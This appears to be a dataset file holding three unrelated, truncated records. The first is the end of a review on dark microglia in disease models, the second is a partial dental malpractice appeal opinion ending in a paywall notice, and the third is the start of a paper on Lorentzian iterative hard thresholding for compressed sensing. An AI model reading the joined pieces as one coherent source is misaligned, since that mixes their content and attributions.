+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Social defeat stress | 8--9 weeks | | | | |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr20-1759091420925335]) | Mouse | C57BL/6, Poly I:C injection at E9.5 | P80-P90 | Dentate gyrus polymorphic layer | Dark microglia defined by Bisht et al. |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr10-1759091420925335]) | Rat | Albino, rotenone injection | Adult | *Substantia nigra* | Dark microglia defined by Bisht et al. |
| | | | | | |
| | | | | | Associated with blood capillaries |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr56-1759091420925335]) | Human | Schizophrenia patients | 56.4 ± 17.2 years old | White matter near the Layer VI of prefrontal cortex | Described as dystrophic microglia (dark and electron-dense nucleus, cytoplasm with vacuoles) |
| | | | | | |
| | | (*n* = 21) | | | |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr9-1759091420925335]) | Mouse | APP^Swe^-PS1ΔE9 | 14 months | Hippocampal CA1 *strata radiatum* and *lacunosum-moleculare* | Dark microglia defined by Bisht et al., (associated with plaques and TREM2+) |
| | | | | | |
| | | | | | Intermediate stages of dark microglia (typical microglial heterochromatin pattern, darker cytoplasm, ER dilation) |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr22-1759091420925335]) | Mouse | C57BL/6-*Npc1^nmf164^*, Western diet | 8 weeks | Molecular layer of the cerebellum | Dark activated microglial processes interacting with synapses |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr3-1759091420925335]) | Rat | Unknown | P14 | Layer VI of somatosensory cortex | Darker cytosol |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ([@bibr39-1759091420925335]) | Mouse | 3-month-old C57BL/6, injected biweekly for 3 weeks with K161 | 4 months | Cerebral cortex | Not determined |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
*Note*. ER = endoplasmic reticulum; KO = knockout; TREM2 = triggering receptor expressed on myeloid cells 2.
At first glance, the most obvious ultrastructural feature distinguishing DM from typical microglia is their altered heterochromatin pattern ([@bibr2-1759091420925335]). Compared with typical microglia, whose nucleoplasm consists of a lighter, electron-lucent euchromatin, accompanied by a dark, electron-dense heterochromatin lining the inner part of the nuclear membrane and small dark patches randomly distributed throughout the nucleoplasm ([@bibr40-1759091420925335]), DM display a condensed and electron-dense nucleoplasm resulting in a near loss of the classical microglial pattern ([@bibr2-1759091420925335]). Previous studies have suggested that considerable chromatin remodeling is associated with active phenotypic changes driven by altered gene expression ([@bibr28-1759091420925335]). This association, however, has not yet been investigated in the DM. It was also suggested that the DM appearance emanates from well-preserved proteins exhibiting high affinity toward osmium tetroxide, a fixative used for the preparation of electron microscopy samples to contrast lipids ([@bibr1-1759091420925335]; for a more detailed explanation of electron microscopy sample preparation for DM analyses, see [@bibr52-1759091420925335]). Furthermore, DM display several oxidative and metabolic stress-induced alterations including disrupted mitochondria, dilation of the Golgi apparatus and endoplasmic reticulum, as well as cell shrinkage ([@bibr2-1759091420925335]). It is important to note that while DM show ultrastructural alterations, evidence from electron microscopy analyses suggests that DM are not undergoing apoptosis or necrosis considering their lack of various nuclear alterations associated with these modes of cell death (e.g., blebbing, rounding, fragmentation; [@bibr1-1759091420925335]) ([Figure 1](#fig1-1759091420925335){ref-type="fig"}). However, thorough molecular analyses would be required to confirm that these cells are not dying.
{#fig1-1759091420925335}
DM also possess numerous thin and long processes forming acute angles in contrast to the typical microglia that display thicker and shorter processes with more obtuse angles ([@bibr2-1759091420925335]; [Figure 1](#fig1-1759091420925335){ref-type="fig"}). Previous transmission electron microscopy observations have shown that DM extensively interact with their microenvironment, making contacts with neurons, other glial cells, and components of the neuropil (axon terminals, dendritic spines, synapses, and other cellular elements). Their abundant endosomes also suggested their highly phagocytic nature ([@bibr2-1759091420925335]). DM tend to form clusters and are found in close proximity to capillaries. Indeed, around two thirds of the DM observed by transmission electron microscopy ensheathed the brain vasculature, with approximately one eighth of them contacting two blood vessels ([@bibr2-1759091420925335]).
Reports from recently published studies point toward a microglial role in the formation of the blood--brain barrier and maintenance of blood vessels ([@bibr8-1759091420925335]; [@bibr14-1759091420925335]; [@bibr26-1759091420925335]). In this context, the decline of vascular integrity and microvascular density ([@bibr61-1759091420925335]) accompanied by elevated permeability of blood--brain barrier seen over the course of aging and during pathological conditions such as chronic inflammation ([@bibr5-1759091420925335]; [@bibr16-1759091420925335]) hints toward a possible vascular-related role for the DM.
DM are not always found: their near-total absence in normal adult brain ([@bibr2-1759091420925335]) but prevalence in pathology suggests that their appearance is either a cause or consequence (e.g., functional need for the DM) of parenchymal changes. Mouse models of long-term stress exposure (model of social defeat or chronic unpredictable stress), aging (14-month-old mice), AD pathology (amyloid precursor protein-presenilin 1 \[APP-PS1\] mouse model where APP possesses a double Swedish mutation and PSEN1 has an exon-9-deleted mutation; [@bibr21-1759091420925335]), and fractalkine signaling deficiency (CX3CR1 knockout mice) were all reported to possess an increased number of DM in several brain areas such as the hippocampal CA1 region (*strata lacunosum-moleculare* and *radiatum*), subgranular layers of cerebral cortex, basolateral nucleus of the amygdala, and hypothalamic median eminence ([@bibr2-1759091420925335]). Because neuronal circuit remodeling is a shared feature of various pathological conditions, it is likely that DM play a crucial role in the plasticity of synapses seen in these contexts. This role, however, has yet to be fully uncovered.
A difference in immunoreactivity to various proteins associated with myeloid cells can be observed between the DM and the typical microglia. Contrary to the latter, DM display a low immunoreactivity for homeostatic myeloid cell markers such as ionized calcium-binding protein (IBA1) and green fluorescent protein (GFP) in the case of CX3CR1-GFP reporter mice ([@bibr2-1759091420925335]). Their ramified processes encircling various elements of the synaptic neuropil strongly express phagocytic microglia-specific 4D4 ([@bibr2-1759091420925335]) and the integrin alpha M subunit (CD11b), a complement receptor 3 element involved in microglia-dependent synaptic pruning ([@bibr44-1759091420925335]). In addition, in specific conditions such as AD pathology, the DM were found to express triggering receptor expressed on myeloid cells 2 (TREM2), particularly when associated with amyloid β plaques ([@bibr2-1759091420925335]). These cells also displayed increased phagocytosis of amyloid β as well as interactions with dystrophic synaptic elements ([@bibr2-1759091420925335]). Further immunohistochemical analyses revealed negative reactivity of DM toward other cell type markers such as ALDH1L1 (astrocytes), OLIG2 (oligodendrocytes), or CD11c (dendritic cells; expressed also by the DAM and neurodegenerative phenotype \[MGnD\]; [@bibr23-1759091420925335]; [@bibr27-1759091420925335]) or major histocompatibility complex (MHC)II (antigen-presenting cells; [@bibr2-1759091420925335]). No sensitivity was detected also for some markers of cells with a myeloid origin such as CD206 (perivascular macrophages) and 4C12 (inflammatory monocytes), or the microglial homeostatic marker P2RY12 (purinergic receptor; [@bibr2-1759091420925335]). Although their origin remains unclear with the evidence currently available, their immunoreactivity to the phagocytic microglial marker 4D4 and lack of immunoreactivity to 4C12 suggest an origin from the embryonic yolk sac, similar to the typical microglia. Supporting this hypothesis, their presence was observed in the absence of C-C chemokine receptor type 2 ([@bibr2-1759091420925335]), using a knockout mouse model where infiltrating monocytes do not migrate in the CNS ([@bibr34-1759091420925335]; [@bibr11-1759091420925335]).
Advances in the Dark Microglial Field {#sec3-1759091420925335}
=====================================
Development {#sec4-1759091420925335}
-----------
Although much remains to be discovered, a strong foundation was built with the ultrastructural description of the DM, therefore stimulating further studies to elucidate the role of DM in various species and models. Indeed, since the initial description of the DM by Bisht et al., numerous studies have provided insightful findings in regard to this microglial subtype. Because one hypothesis is that DM might contribute to excessive remodeling of synaptic connections leading to abnormal neuronal circuitry formation, it is crucial to focus on early periods of brain development where extensive and dynamic microglia-dependent synaptic remodeling occurs ([@bibr37-1759091420925335]; [@bibr44-1759091420925335]). Interestingly, a recent study hinted to the presence of DM during development (postnatal day 14), a period undergoing pronounced synaptic plasticity ([@bibr4-1759091420925335]), in the rat somatosensory cortex ([@bibr3-1759091420925335]). This elegant study reconstructed in three-dimensions numerous cell types, including microglia, with the help of serial block-face scanning electron microscopy. From their reconstruction, the authors discovered that approximately one third of microglia imaged in Layer VI had a dark cytosol, a characteristic of the intermediate state (i.e., microglia showing both typical and DM features) and the fully formed DM defined by Bisht et al. (2016b). It is unclear, however, if these cells possess other ultrastructural characteristics commonly seen in DM, such as dilation of the endoplasmic reticulum/Golgi apparatus and altered mitochondria. The presence of DM in the postnatal developmental stage could be somehow related to the overabundance of cellular debris and active pruning processes resulting from dynamic tissue remodeling.
Psychiatric Disorders {#sec5-1759091420925335}
---------------------
The presence of the DM was also characterized in a mouse model of maternal immune activation, with the help of transmission electron microscopy ([@bibr20-1759091420925335]). This environmental stressor was previously associated with microglial priming, which causes their exacerbated inflammatory and nonphysiological response to secondary challenges, thus promoting a wide range of psychiatric disorder-like behaviors ([@bibr32-1759091420925335]; [@bibr54-1759091420925335]). Prenatal administration (at embryonic day 9.5) of polyinosinic:polycytidylic acid (poly I:C), a molecule mimicking viral double-stranded RNA infection ([@bibr48-1759091420925335]), resulted in a significant increase of DM density in the hippocampal dentate gyrus (DG) polymorphic layer of male offspring, without significant differences seen in females at adulthood ([@bibr20-1759091420925335]). Combined with the noticeable schizophrenia-like phenotype of male offspring, this finding hints to possible sex-related differences in the pathophysiological mechanisms that would affect the genesis of DM or vice versa. The DG plays a key role in learning, memory formation, and spatial orientation functioning as a niche of neurogenesis throughout life ([@bibr49-1759091420925335]; [@bibr12-1759091420925335]). A possibility exists that extensive interactions between the DM and synapses in the DG could contribute to abnormal functional connectivity, though additional insights are necessary.
Moreover, a recent *postmortem* study has shown microglial cells that are ultrastructurally similar to the DM subtype in the prefrontal cortex of schizophrenia patients ([@bibr56-1759091420925335]). Indeed, these microglia, described as "dystrophic," possessed an electron-dense nucleus and cytoplasm filled with vacuoles ([@bibr56-1759091420925335]). Interestingly, these cells were located in the white matter, in close proximity to oligodendrocytes. Considering that these DM were found in the white matter next to oligodendrocytes ([@bibr56-1759091420925335]), it is likely that they could have a direct or indirect effect on oligodendrocytic functions such as myelin formation.
Neurodegenerative Diseases and Neuroinflammation {#sec6-1759091420925335}
------------------------------------------------
Consistent with results of the first article describing DM in AD pathology ([@bibr2-1759091420925335]), plaque-associated DM-like cells were distinguished in the hippocampus CA1 of adult APP-PS1 mice using correlative light, transmission and scanning electron microscopy ([@bibr9-1759091420925335]). AD is a progressive neurodegenerative disease that is characterized by the extracellular accumulation of plaques containing fibrillar amyloid β and intracellular accumulation of hyperphosphorylated tau protein into the shape of neurofibrillary tangles ([@bibr50-1759091420925335]). Resulting neuronal and synaptic loss strongly correlate with the cognitive impairment and dementia described in AD patients ([@bibr50-1759091420925335]). In the APP-PS1 mouse model, [@bibr9-1759091420925335] also observed microglia with a preserved, distinct heterochromatin pattern and a less-dark appearance that suggested the existence of an intermediate phenotype between the typical and DM ([@bibr9-1759091420925335]), thus further supporting the idea that DM might be part of a heterogenous microglial spectrum.
DM were seen for the first time in PD pathology by examining the *substantia nigra* of male albino rats that received subcutaneous injections of rotenone, a broad-spectrum insecticide, piscicide, and pesticide that inhibits the Complex I of the mitochondrial electron transport chain ([@bibr10-1759091420925335]). PD is a neurodegenerative pathology characterized by, but not limited to, synaptopathy, presence of misfolded α-synuclein aggregates (Lewy bodies), and loss of dopaminergic neurons in the *substantia nigra pars compacta* that result in cognitive and motor deficits ([@bibr45-1759091420925335]; [@bibr30-1759091420925335]). In this study, [@bibr10-1759091420925335] found, using transmission electron microscopy, the presence of DM near the vasculature, a feature similar to what was seen previously ([@bibr2-1759091420925335]). The authors identified ultrastructural features normally associated with the DM such as condensation of the cyto- and nucleoplasm, highly phagocytic processes and altered mitochondria ([@bibr2-1759091420925335]). However, the study also revealed some apparent divergences from the DM characterized by Bisht et al. Indeed, the DM described in this study possessed a heterochromatin pattern similar to what can be seen in typical microglia ([@bibr10-1759091420925335]). Therefore, the DM in the rotenone rat model could represent an intermediate stage, an analogous phenomenon to what was identified in an AD mouse model ([@bibr9-1759091420925335]). Although their function has not been investigated, the intermediate and dark microglia could play a role in the synaptic loss seen in AD and PD, as these cells were previously shown to interact extensively with synaptic elements.
Following up on these findings, the presence of DM was investigated in the same brain area as El Hajj et al., in a lipopolysaccharide (LPS)-induced mouse model of sickness behavior ([@bibr43-1759091420925335]). The connection between systemic inflammation and microglial response in sickness behavior has been extensively covered ([@bibr6-1759091420925335]; [@bibr18-1759091420925335]). While the acute systemic injection of LPS (1 mg/kg) was able to generate profound alterations of the inflammatory profile and microglial ultrastructure, no cell harboring ultrastructural features of DM was recognized at a 24-hour time point. Another condition, a mouse model of Niemann-Pick type C, where neurodegeneration and inflammation are found, revealed the presence of the DM. Indeed, [@bibr22-1759091420925335] investigated NPC^nmf164^ mice given for 5 weeks either a Western diet or a regular diet. Niemann-Pick type C is a genetic condition with mutations in the NPC genes (*Npc1/2*), which most notably lead to dysfunctional lysosomes ([@bibr59-1759091420925335]). While looking at microglia in the molecular layer of the cerebellum of both males and females with transmission electron microscopy, the authors identified DM processes interacting with synapses, a phenomenon especially seen in the mice given a Western diet ([@bibr22-1759091420925335]). This finding indicates that Western diet exacerbates the inflammation found in this mouse model and causes alterations sufficient to generate DM. Although DM are frequently found in an inflammatory brain parenchyma like that of NPC^nmf164^ mice, it is not always the case (e.g., in acute inflammation induced by LPS injection), suggesting that the genesis of the DM might depend on a specific mechanism or pathway related to inflammation, or require chronic challenges.
Beyond Electron Microscopy {#sec7-1759091420925335}
--------------------------
Electron microscopy is not the only tool that was used to characterize the DM. Indeed, [@bibr39-1759091420925335] performed flow cytometry experiments, gating with CD11b and TREM2, to determine if DM were present in the cerebral cortex of 4-month-old C56BL/6 mice injected biweekly for 3 weeks with a pan-SH-2 containing inositol 5\' polyphosphatase (SHIP)1/2 inhibitor, K161. The protein SHIP-1 is able to bind to the adaptor protein DAP12 resulting in the inhibition of the TREM2 signaling pathway ([@bibr36-1759091420925335]). Therefore, modulating SHIP1/2 pathway to prevent this inhibition could be useful for the treatment of neurodegenerative diseases where TREM2 was shown to have a beneficial effect ([@bibr33-1759091420925335]; [@bibr57-1759091420925335]). TREM2 was previously identified as a key protein for the genesis of various microglial subtypes including the DAM and MGnD ([@bibr23-1759091420925335]; [@bibr27-1759091420925335]). CD11b, an essential component of the complement receptor 3 involved in synaptic pruning, is a protein expressed by both dark and typical microglial cells ([@bibr2-1759091420925335]; [@bibr19-1759091420925335]). The study showed no difference of CD11b and TREM2 mean fluorescence intensity between controls and K161-treated animals and therefore concludes that DM do not emerge as a result of the K161 treatment (Pedicone et al., 2020). However, in this case, the interpretation of these results does not necessarily take into account all information concerning the DM. TREM2 and CD11b are not exclusively expressed by the DM and therefore cannot be used as specific markers for this subtype ([@bibr2-1759091420925335]). Moreover, while it is possible to determine the immunoreactivity of a cell for a particular protein with electron microscopy, it is difficult, albeit close to impossible, to quantify with exactitude immunoreactivity levels. Therefore, the levels of proteins such as CD11b and TREM2 that are expressed by the DM versus the typical microglia or other subtypes are yet unknown, and their varying expression cannot be currently used as a tool to distinguish other populations from the DM. The expression of TREM2 by the DM was identified in an APP-PS1 model but not characterized yet in other models. It would be crucial to determine, using electron microscopy, if this subtype expresses CD11b and TREM2 in the K161-treated mice for a full interpretation of the results as well as assess the specificity of the protein to DM (see [Table 1](#table1-1759091420925335){ref-type="table"} for a full summary of the published dark microglial studies to the authors knowledge).
Conclusion {#sec8-1759091420925335}
==========
Microglial heterogeneity has been a topic of interest in the past few years, and one of these subtypes, the DM, has been no exception. These unique microglial cells first described using transmission electron microscopy are found in numerous pathological conditions where synaptic plasticity is heightened, such as in mouse models of AD, chronic stress, fractalkine signaling deficiency, and aging ([@bibr2-1759091420925335]). Recently, they have also been identified in rats and humans ([@bibr10-1759091420925335]; [@bibr56-1759091420925335]; [@bibr3-1759091420925335]), suggesting that this subtype is conserved across species. Studying these cells and learning more about their function could, in the future, be applied to the human condition. Indeed, these cells that are associated with ultrastructural features of oxidative stress seem to interact excessively with synaptic elements, suggesting that their presence could exacerbate the synaptic loss seen in pathology. Modulating these cells could hence be a potential new therapeutic target for neurodegenerative disease such as AD and PD.
While electron microscopy allows to provide an in-depth ultrastructural analysis of the DM, many questions remain to be answered due to technical limitation. Indeed, their unique ultrastructural feature, most notably their dark cyto- and nucleoplasm as well as the lack of chromatin pattern, is the only way to properly identify these cells currently. Therefore, electron microscopy is the only tool that can be used to characterize these cells.
Fortunately, new electron microscopy techniques, such as serial-block face and focused ion beam scanning electron microscopy, that can reconstruct taken images in three dimensions, have been developed and can help answer some of the remaining questions regarding the DM. Identifying a specific marker for this subtype, which could be used to perform high-throughput molecular analyses and create transgenic models, will be crucial for the future of the DM field. With these transgenic models, it would be possible for researchers to isolate these cells and further process them using state-of-the-art RNA sequencing for instance to learn more about their function, especially in regard to inflammation, the vasculature and synapses, and their altered transcriptome compared with the typical microglia (e.g., determine if they possess a more pro- or anti-inflammatory profile). Moreover, although some clues have already been provided regarding the DM origin (e.g., immunopositivity for 4D4 and immunonegativity for 4C12, as well as presence in C-C chemokine receptor type 2 knockout mice), determining their gene expression could provide more certitude as to whether they come from the periphery or the embryonic yolk sac. In addition, dynamic analysis of DM process motility using *in vivo* two-photon microscopy could be useful to determine how their hyperramifications seen in electron microscopy interact with neurons and synapses.
Authors\' Note
==============
Marie-Ève Tremblay is also affiliated with Division of Medical Sciences, University of Victoria.
Declaration of Conflicting Interests {#sec9-1759091420925335}
====================================
The author(s) declared no potential conflicts of interest with respect to the research, authorship, and/or publication of this article.
Funding {#sec10-1759091420925335}
=======
The author(s) disclosed receipt of the following financial support for the research, authorship, and/or publication of this article: M.-K. S.-P. holds a Canadian Institute of Health Research and a Fonds de recherche du Québec-Santé doctoral scholarship. E. S. holds a national scholarship program of the Slovak Republic provided by Slovak Academic Information Agency. M.-E. T. holds a Tier II Canada Research Chair in Neurobiology of Aging and Cognition.
ORCID iD
========
Marie-Ève Tremblay <https://orcid.org/0000-0003-2863-9626>
| 2024-03-13T01:27:15.642919 | https://example.com/article/2676 |
The plaintiff in this case, Jean Ann Longman, sued the defendant, Dr. Clement Jasiek, a dentist specializing in oral surgery. The case came to trial in the Circuit Court of La Salle County, resulting in a verdict and judgment for the plaintiff in the amount of $35,000. A post-trial motion and a motion to reduce judgment were denied by the presiding judge below, and this appeal followed.
In late 1975, Jean Ann Longman was 23 years old, in good health, and recently graduated from Illinois State University in Normal with a degree in political science. Upon the advice of her family dentist, Dr. Harold Hutchinson, Jean made an appointment to have four wisdom teeth removed by the defendant in this cause, Dr. Jasiek. On December 17, 1975, Jean went from her home in Henry, Illinois, to the office of Dr. Jasiek in La Salle, where all four of her wisdom teeth were removed, two of which required a surgical procedure followed by suturing of the gum and skin where the removal had taken place.
Jean returned on December 23 for the purpose of having the sutures removed and for the defendant to be able to see the areas of the operation. She had experienced no unexpected discomfort during the interim, and the sutures were removed uneventfully.
On the next day, December 24, in the evening, Jean developed pain and stiffness and swelling in her right jaw which continued through that evening and on into the next day, Christmas. On the morning of the 26th, with the condition still persisting, Jean called Dr. Jasiek's office to report her condition and to seek his care and assistance. At this point her jaw was very stiff and she could barely move it at all. She spoke to the doctor's nurse and explained the problem she was having. The doctor's nurse asked if she was having pain in the area of the extraction itself. Jean replied "no" and the nurse, with Dr. Jasiek's approval, advised Jean that since she wasn't having any pain in the area of the extraction then her problems were not related to the oral surgery. She was told to see a medical doctor.
Later that day Jean went to see her family doctor in Henry. The general practitioner, Dr. Anton F. Tochalauski, examined Jean and suggested that she see her oral surgeon, who, the family doctor felt, would be better qualified to treat the problem. Jean explained that the oral surgeon's office had refused her treatment and referred her instead to her family doctor. Under those circumstances, Dr. Tochalauski gave Jean an injection of a steroid-type medicine and prescribed a modest dosage of penicillin in oral form. As a result of this medication Jean experienced some immediate relief of her pain and swelling, but by the 29th of December the pain was back and even more intense. Moreover, the swelling persisted and she could barely move her mouth.
Jean again called the oral surgeon's office and related her symptoms, to-wit, pain and swelling in her jaw. Again she was told to see her family doctor. Jean followed the telephoned instructions from the oral surgeon's office and visited Dr. Tochalauski. The family practitioner again recommended that Jean see the oral surgeon who had extracted her teeth, but after hearing Jean relate his telephonic refusal to assist, the December 26 treatments were repeated.
The steroid penicillin combination brought immediate but shortlived relief. On January 5, 1976, Jean was returning to her family doctor who, for the first time in his examination, noted evidence of infection. On this, the third visit, Dr. Tochalauski had the plaintiff admitted to St. Francis Hospital in Peoria. She was exhibiting symptoms of swelling of the right cheek, headaches, temperature, restricted jaw movement, and drainage from the right side of the mouth. Jean was treated with a high dosage of intravenous penicillin for eight days followed by reduced dosages of oral penicillin. Sixteen days later, on January 21, Jean was discharged from the hospital with a continuing prescription for oral penicillin.
Less than two weeks later, on February 2, 1976, Jean was rehospitalized with a temperature, facial swelling on the right side, and a continuing abscess at the site of her tooth extraction. During this hospital stay, which extended for a period of four weeks, an infection of the jaw bone known as osteomyelitis was diagnosed. Jean was placed on an even higher dosage of intravenous penicillin. By March 11, Jean's pain and swelling had subsided and the doctors felt that the infection and osteomyelitis were under control. She was discharged from the hospital with a continuing prescription for oral penicillin. Since leaving the hospital, Jean has continued to improve.
Based on the preceding sequence of events, Jean brought suit against Dr. Jasiek alleging that as a result of abandonment of and refusal to treat the plaintiff, an abscess developed in the right part of her jaw which eventually reached the bone and developed into osteomyelitis. The verdict reached in the proceeding below attests to the fact that the jury agreed with the allegations in the complaint. Dr. Jasiek prosecuted this appeal.
The defendant doctor urges us to find that the verdict reached below was against the manifest weight of the evidence and that the alleged act of malpractice, specifically, abandonment of the patient, was not established as a matter of law under prevailing precedent. The facts previously set forth in this opinion were all excerpted from the record of the trial below and represented evidence properly admitted for the jury's consideration. In addition, the defendant himself made certain damaging admissions under questioning by plaintiff's counsel pursuant to section 60 of the Civil Practice Act (Ill. Rev. Stat. 1979, ch. 110, par. 60). Among other responses to section 60 inquiries, the defendant admitted that it was likely that plaintiff's condition could have been taken care of if treated by an oral surgeon, that swelling near the area of extraction was a symptom of abscess developing, and that in some cases the only effective treatment for an abscess is to open it up. After these statements, the following exchange took place between plaintiff's counsel and the defendant:
"Counsel: Certainly any patient that develops swelling near the site of extractions in the jaw area seven days or more after the extractions you would want to see them on a follow-up basis, wouldn't you?
Defendant: Unless it's another problem.
Counsel: You couldn't tell if it was another problem unless you ...
Our website includes the first part of the main text of the court's opinion.
To read the entire case, you must purchase the decision for download. With purchase,
you also receive any available docket numbers, case citations or footnotes, dissents
and concurrences that accompany the decision.
Docket numbers and/or citations allow you to research a case further or to use a case in a
legal proceeding. Footnotes (if any) include details of the court's decision. If the document contains a simple affirmation or denial without discussion,
there may not be additional text.
Buy This Entire Record For
$7.95
Download the entire decision to receive the complete text, official citation,
docket number, dissents and concurrences, and footnotes for this case. | 2024-04-10T01:27:15.642919 | https://example.com/article/3781 |
---
abstract: 'Commonly employed reconstruction algorithms in compressed sensing (CS) use the $L_2$ norm as the metric for the residual error. However, it is well-known that least squares (LS) based estimators are highly sensitive to outliers present in the measurement vector leading to a poor performance when the noise no longer follows the Gaussian assumption but, instead, is better characterized by heavier-than-Gaussian tailed distributions. In this paper, we propose a robust iterative hard Thresholding (IHT) algorithm for reconstructing sparse signals in the presence of impulsive noise. To address this problem, we use a Lorentzian cost function instead of the $L_2$ cost function employed by the traditional IHT algorithm. We also modify the algorithm to incorporate prior signal information in the recovery process. Specifically, we study the case of CS with partially known support. The proposed algorithm is a fast method with computational load comparable to the LS based IHT, whilst having the advantage of robustness against heavy-tailed impulsive noise. Sufficient conditions for stability are studied and a reconstruction error bound is derived. We also derive sufficient conditions for stable sparse signal recovery with partially known support. Theoretical analysis shows that including prior support information relaxes the conditions for successful reconstruction. Simulation results demonstrate that the Lorentzian-based IHT algorithm significantly outperform commonly employed sparse reconstruction techniques in impulsive environments, while providing comparable performance in less demanding, light-tailed environments. Numerical results also demonstrate that the partially known support inclusion improves the performance of the proposed algorithm, thereby requiring fewer samples to yield an approximate reconstruction.'
author:
- 'Rafael E. Carrillo and Kenneth E. Barner [^1]'
bibliography:
- 'abrev.bib'
- 'RGCD.bib'
- 'carrillo-publications.bib'
- 'RCS.bib'
- 'RGCD1.bib'
- 'robustlmestimation.bib'
title: 'Lorentzian Iterative Hard Thresholding: Robust Compressed Sensing with Prior Information'
---
Compressed sensing, sampling methods, signal reconstruction, nonlinear estimation, impulse noise.
Introduction {#sec:intro}
============
Compressed sensing (CS) demonstrates that a sparse, or compressible, signal can be acquired using a low rate acquisition process that projects the signal onto a small set of vectors incoherent with the sparsity basis [@Cand08b]. There are several reconstructions methods that yield perfect or approximate reconstruction proposed in the literature (see [@Cand08b; @Need08; @Blu10] and references therein). To see a review and comparison of the most relevant algorithms see [@Need08]. Since noise is always present in practical acquisition systems, a range of different algorithms and methods have been developed that enable approximate reconstruction of sparse signals from noisy compressive measurements [@Cand08b; @Need08; @Blu10]. Most such algorithms provide bounds for the $L_2$ reconstruction error based on the assumption that the corrupting noise is Gaussian, bounded, or, at a minimum, has finite variance. In contrast to the typical Gaussian assumption, heavy-tailed processes exhibit very large, or infinite, variance. Existing reconstruction algorithms operating on such processes yield estimates far from the desired original signal.
Recent works have begun to address the reconstruction of sparse signals from measurements corrupted by impulsive processes [@Laska09; @Carr10; @Arce10a; @Paredes10a; @Studer12]. The works in [@Laska09] and [@Studer12] assume a sparse error and estimate both signal and error at the same stage using a modified $L_1$ minimization problem. Carrillo *et al.* propose a reconstruction approach based on robust statics theory in [@Carr10]. The proposed non-convex program seeks a solution that minimizes the $L_1$ norm subject to a nonlinear constraint based on the Lorentzian norm. Following this line of thought, this approach is extended in [@Arce10a] to develop an iterative algorithm to solve a Lorentzian $L_0$-regularized cost function using iterative weighted myriad filters. A similar approach is used in [@Paredes10a] by solving an $L_0$-regularized least absolute deviation regression problem yielding an iterative weighted median algorithm. Even though these approaches provide a robust CS framework in heavy-tailed environments, numerical algorithms to solve the proposed optimization problem are slow and complex as the dimension of the problem grows.
Recent results in CS show that modifying the recovery framework to include prior knowledge of the support improves the reconstruction results using fewer measurements [@Vaswani09; @Jac09]. Vaswani *et. al* assume that part of the signal support is known *a priori* and the problem is recast as finding the unknown support. The remainder of the signal (unknown support) is a sparser signal than the original, thereby requiring fewer samples to yield an accurate reconstruction [@Vaswani09]. Although the modified CS approach in [@Vaswani09] needs fewer samples to recover a signal, it employs a modified version of basis pursuit (BP) [@Cand08b] to perform the reconstruction. The computational cost of solving the convex problem posed by BP can be high for large scale problems. Therefore, in [@Carr10c] we proposed to extend the ideas of modified CS to iterative approaches like greedy algorithms [@Need08] and iterative reweighted least squares methods [@Chart08]. These algorithms construct an estimate of the signal at each iteration, and are thereby amenable to incorporation of *a priori* support information (1) as an initial condition or (2) at each iteration. Although the aforementioned methods are more efficient than BP, in terms of computational cost, a disadvantage of these methods is the need to invert a linear system at each iteration.
In this paper we propose a Lorentzian based iterative hard thresholding (IHT) algorithm and a simple modification to incorporate prior signal information in the recovery process. Specifically, we study the case of CS with partially known support. The IHT algorithm is a simple iterative method that does not require matrix inversion and provides near-optimal error guarantees [@Blu08; @Blu09]. Hard thresholding algorithms have been previously used in image denoising [@Bect04] and sparse representations [@Daub04; @Tropp06c]. All of these methods are particular instances of a more general class of iterative thresholding algorithms [@Fig03; @Elad07b]. A good general overview of iterative thresholding methods is presented in [@Elad07b]. Related convergence results are also given in [@Comb05].
The proposed algorithm is a fast method with computational load comparable to the least squares (LS) based IHT, whilst having the advantage of robustness against heavy-tailed impulsive noise. Sufficient conditions for stability are studied and a reconstruction error bound is derived. We also derive sufficient conditions for stable sparse signal recovery with partially known support. Theoretical analysis shows that including prior support information relaxes the conditions for successful reconstruction. Simulations results demonstrate that the Lorentzian based IHT algorithm significantly outperform commonly employed sparse reconstruction techniques in impulsive environments, while providing comparable performance in less demanding, light-tailed environments. Numerical results also demonstrate that the partially known support inclusion improves the performance of the proposed algorithm, thereby requiring fewer samples to yield an approximate reconstruction.
The organization of the rest of the paper is as follows. Section \[sec:BM\] gives a brief review of CS and motivates the need of a simple robust algorithm capable of inclusion of prior support knowledge. In Section \[sec:CH6LIHT\] a robust iterative algorithm based on the Lorentzian norm is proposed and its properties are analyzed. In Section \[sec:CH6PI\] we propose simple modification for the developed algorithm to include prior signal signal information and analyze the partially known support case. Numerical experiments evaluating the performance of the proposed algorithms in different environments are presented in Section \[sec:CH6Res\]. Finally, we close in Section \[sec:Ch6conc\] with conclusions and future directions.
Background and Motivation {#sec:BM}
=========================
Lorentzian Based Basis Pursuit {#ssec:LBP}
------------------------------
Let $x\in \mathbb{R}^n$ be an $s$-sparse signal or an $s$-compressible signal. A signal is $s$-sparse if only $s$ of its coefficients are nonzero (usually $s \ll n$). A signal is $s$-compressible if its ordered set of coefficients decays rapidly and $x$ is well approximated by the first $s$ coefficients [@Cand08b].
